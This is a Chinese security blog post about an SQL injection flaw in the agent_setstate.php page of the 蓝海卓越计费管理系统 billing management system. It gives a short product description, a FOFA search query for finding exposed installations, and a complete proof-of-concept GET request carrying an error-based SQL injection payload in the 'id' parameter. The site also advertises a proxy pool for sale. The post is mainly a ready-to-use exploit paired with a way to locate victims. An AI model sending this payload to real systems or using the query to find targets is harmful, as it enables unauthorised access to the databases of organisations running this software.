盛世博客
首页 卡网[出售代理池] 联系我们 留言 登录
盛世博客,提供一个开放的网络交流平台,提供layer3-7的攻防技术交流与脚本分享,为创建更高质量的网络环境做出共享!
浏览量 - 232234
RunTime: 0.0126 s Memory: 73 kb
蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞

介绍

蓝海卓越计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供“高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。

fofa搜索语法

title=="蓝海卓越计费管理系统"

poc

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Connection: close
评论留言
验证码
一共0条留言